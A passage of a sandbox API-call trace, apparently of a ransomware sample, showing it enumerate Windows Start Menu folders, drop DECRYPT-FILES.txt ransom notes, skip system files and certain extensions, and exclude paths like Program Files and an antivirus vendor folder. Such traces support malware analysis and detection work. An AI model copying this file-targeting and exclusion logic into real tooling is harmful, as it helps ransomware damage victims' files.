lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x28c [0182.428] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0182.428] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.428] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt") returned 127 [0182.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.428] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0182.428] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*" [0182.428] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc1cc60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc1cc60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479a38 [0182.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.428] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc1cc60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc1cc60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.428] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc1cc60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc1cc60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc1cc60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.428] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.429] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.429] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.429] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.429] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.429] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.429] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.429] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 109 [0182.429] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.429] lstrcpyW (in: lpString1=0x36fdb74, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0182.429] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\0a16c9.tmp" [0182.429] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.429] CloseHandle (hObject=0x0) returned 0 [0182.429] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.429] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="autorun.inf") returned 1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="boot.ini") returned 1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="desktop.ini") returned -1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat") returned -1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="iconcache.db") returned -1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="bootsect.bak") returned 1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat.log") returned -1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="thumbs.db") returned -1 [0182.430] lstrcmpiW (lpString1="computer.lnk", lpString2="Bootfont.bin") returned 1 [0182.430] lstrlenW (lpString="computer.lnk") returned 12 [0182.430] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.430] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e084aaf, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Control Panel.lnk", cAlternateFileName="CONTRO~1.LNK")) returned 1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="autorun.inf") returned 1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="boot.ini") returned 1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="desktop.ini") returned -1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat") returned -1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="iconcache.db") returned -1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="bootsect.bak") returned 1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat.log") returned -1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="thumbs.db") returned -1 [0182.430] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="Bootfont.bin") returned 1 [0182.430] lstrlenW (lpString="Control Panel.lnk") returned 17 [0182.430] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.430] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac219a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac219a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac219a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.430] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.430] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0182.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0182.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0182.430] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0182.430] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (No Add-ons).lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0182.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="autorun.inf") returned 1 [0182.430] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="boot.ini") returned 1 [0182.431] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="desktop.ini") returned 1 [0182.431] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat") returned -1 [0182.431] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="iconcache.db") returned 1 [0182.431] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="bootsect.bak") returned 1 [0182.431] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat.log") returned -1 [0182.431] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="thumbs.db") returned -1 [0182.431] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="Bootfont.bin") returned 1 [0182.431] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0182.431] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.431] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="autorun.inf") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="boot.ini") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="desktop.ini") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="iconcache.db") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="bootsect.bak") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat.log") returned 1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="thumbs.db") returned -1 [0182.431] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="Bootfont.bin") returned 1 [0182.431] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0182.431] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.431] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 0 [0182.431] FindClose (in: hFindFile=0x479a38 | out: hFindFile=0x479a38) returned 1 [0182.431] CloseHandle (hObject=0x28c) returned 1 [0182.431] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0182.431] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.431] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="autorun.inf") returned 1 [0182.431] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot.ini") returned 1 [0182.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="desktop.ini") returned 1 [0182.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0182.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="iconcache.db") returned 1 [0182.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootsect.bak") returned 1 [0182.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat.log") returned 1 [0182.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="thumbs.db") returned 1 [0182.432] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0182.432] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0182.432] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.432] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0182.432] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0182.432] CloseHandle (hObject=0x284) returned 1 [0182.432] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac23fbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac23fbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0182.432] lstrcmpW (lpString1="Administrative Tools", lpString2=".") returned 1 [0182.432] lstrcmpW (lpString1="Administrative Tools", lpString2="..") returned 1 [0182.432] lstrcatW (in: lpString1="Administrative Tools", lpString2="\\" | out: lpString1="Administrative Tools\\") returned="Administrative Tools\\" [0182.432] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Administrative Tools\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\" [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Program Files") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch=":\\Windows") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Games\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\All Users") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.432] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="AhnLab") returned 0x0 [0182.433] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.433] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0182.433] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.433] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\0a16c9.tmp") returned 116 [0182.433] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0182.433] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0182.433] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.433] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt") returned 123 [0182.433] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\administrative tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.433] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\") returned 105 [0182.433] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0182.433] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc1cc60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc1cc60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0182.433] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.433] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc1cc60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc1cc60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.433] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.433] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.434] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc1cc60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc1cc60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc1cc60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 